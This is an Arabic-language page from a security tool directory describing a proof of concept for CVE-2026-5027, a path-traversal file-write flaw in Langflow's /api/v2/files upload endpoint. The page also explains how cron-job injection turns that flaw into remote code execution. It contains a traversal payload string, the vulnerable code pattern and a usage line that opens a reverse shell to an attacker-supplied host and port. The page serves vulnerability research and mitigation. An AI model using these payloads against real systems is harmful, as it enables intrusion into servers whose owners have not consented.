Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-5027 — Langflow، تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر حقن مهام Cron من خلال اجتياز المسار | Kitploit
أدوات/GitHubGitHub/eqstlab/cve-2026-5027
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubeqstlab/cve-2026-5027

CVE-2026-5027

Langflow، تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر حقن مهام Cron من خلال اجتياز المسار

عرض المستودع
3منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

هذا المنشور مقال بحثي نشر بواسطة EQSTLab.

شكرًا لـ Yahia Hamza، الذي أبلغ عن هذه الثغرة وحللها.

CVE-2026-5027

★ CVE-2026-5027 Langflow Path Traversal / Arbitrary File Write PoC ★ CVE-2026-5027 PoC test


الوصف

CVE-2026-5027 : ثغرة الكتابة التعسفية للملفات في Langflow

الوصف: ثغرة اجتياز المسار في Langflow <= 1.8.4 تسمح للمهاجمين بكتابة ملفات تعسفية خارج دليل الرفع المقصود عبر filename متعدد الأجزاء (multipart) مُصمم بعناية يُرسل إلى نقطة النهاية /api/v2/files. في النشرات التي يكون فيها تسجيل الدخول التلقائي مفعّلًا أو يكون المصادقة ضعيفة التطبيق بخلاف ذلك، قد تُستغل هذه المشكلة لتحقيق تنفيذ عن بُعد للتعليمات البرمجية (RCE) عن طريق كتابة محتوى يتحكم به المهاجم إلى مواقع حساسة في نظام الملفات.


إعداد المختبر

قم ببناء وتشغيل البيئة القابلة للاستغلال باستخدام Docker:

بناء الصورة

root@kitploit:~
docker build -t cve-2026-5027 .

تشغيل الحاوية

root@kitploit:~
docker run --rm -it -p 9013:9013 --name cve-2026-5027 cve-2026-5027

طريقة الاستخدام

التنفيذ

root@kitploit:~
# إثبات المفهوم (يكتب ملف اختبار إلى /tmp/)
python3 CVE-2026-5027.py -t <TARGET>

# قشرة عكسية عبر مهام cron
python3 CVE-2026-5027.py -t <TARGET> --lhost <YOUR_IP> --lport 4444

التحليل

نقطة النهاية القابلة للاستغلال

root@kitploit:~
POST /api/v2/files

تكمن المشكلة في أن وظيفة الرفع تثق في قيمة filename متعددة الأجزاء المقدمة من العميل. بدلاً من توليد اسم تخزين آمن من جانب الخادم أو تقييد المسار الذي تم حله داخل دليل رفع مخصص، يسمح مسار الكود القابل للاستغلال بتسلسلات اجتياز مثل ../ بالتأثير في مسار الوجهة النهائي.

ونتيجة لذلك، يمكن للمهاجم الهروب من جذر التخزين المقصود وإجبار التطبيق على كتابة ملفات في مواقع تعسفية على نظام ملفات الخادم.

مجرى استغلال تمثيلي يكون كما يلي:

  1. الحصول على رمز وصول عبر تسجيل الدخول العادي أو عبر نشر مفعّل لتسجيل الدخول التلقائي.
  2. إرسال طلب رفع متعدد الأجزاء إلى /api/v2/files.
  3. توفير filename مُصمم يحتوي على تسلسلات اجتياز المسار.
  4. التسبب في كتابة Langflow لمحتوى يتحكم به المهاجم خارج دليل التخزين المتوقع.

هذه في الأساس مشكلة CWE-22: القصور في تقييد اسم المسار إلى دليل مقيد.

السبب الجذري التقني

يحدث الخلل الأمني بسبب عدم كفاية التعقيم والتحقق من مسارات الملفات التي يتحكم بها المستخدم أثناء معالجة الرفع. يقبل التطبيق اسم ملف العميل الأصلي ويمرره إلى سير عمل التخزين دون فرض مناسب لتطبيع المسار واحتوائه.

من وجهة نظر دفاعية، النمط الخطير مشابه من حيث المفهوم لما يلي:

root@kitploit:~
save_path = base_dir / file.filename

إذا كان file.filename يحتوي على مكونات اجتياز مسار مثل:

root@kitploit:~
../../../../tmp/poc.txt

فقد يشير المسار النهائي الذي تم حله إلى خارج base_dir، مما يتيح الكتابة التعسفية للملفات.

لماذا هذا مهم

ثغرات الكتابة التعسفية للملفات غالبًا ما تكون أكثر خطورة من مشكلات الرفع غير المقيد القياسية، لأن المهاجم يتحكم ليس فقط في محتويات الملف، بل أيضًا في مسار الوجهة. اعتمادًا على امتيازات وقت التشغيل لعملية Langflow، قد يتيح ذلك:

  • استبدال ملفات التطبيق
  • تعديل ملفات بدء التشغيل أو المهام المجدولة
  • الثبات عبر ملفات تهيئة الصدفة أو الملفات الرئيسية
  • التصعيد من الكتابة التعسفية للملفات إلى تنفيذ عن بُعد للتعليمات البرمجية

السيناريو

root@kitploit:~
+-------------------------------------------+
|                  المهاجم                   |
+-------------------------------------------+
                      |
                      | الحصول على رمز وصول
                      | أو إساءة استخدام تسجيل الدخول التلقائي
                      v
+-------------------------------------------+
|        Langflow /api/v2/files             |
+-------------------------------------------+
                      |
                      | اسم ملف متعدد الأجزاء مُصمم
                      | (اجتياز الدليل ../)
                      v
+-------------------------------------------+
| كتابة ملفات تعسفية (خارج دليل الرفع)       
+-------------------------------------------+
                      |
                      | الكتابة إلى موقع حساس
                      v
+-------------------------------------------+
|      تنفيذ عن بُعد محتمل للتعليمات البرمجية      |
+-------------------------------------------+

إخلاء المسؤولية

هذا المستودع ليس مخصصًا لتسهيل الاستغلال غير المصرح به لمثيلات Langflow. الغرض من هذا المشروع هو مساعدة باحثي الأمن والمدافعين والمطورين على فهم الثغرة، والتحقق من التعرض في بيئات خاضعة للسيطرة، وتطبيق إجراءات التخفيف الفعالة.


المراجع

https://www.tenable.com/security/research/tra-2026-26

https://www.cve.org/CVERecord?id=CVE-2026-5027

https://github.com/yahiahamza/CVE-2026-5027

https://github.com/langflow-ai/langflow

تنزيل الأداة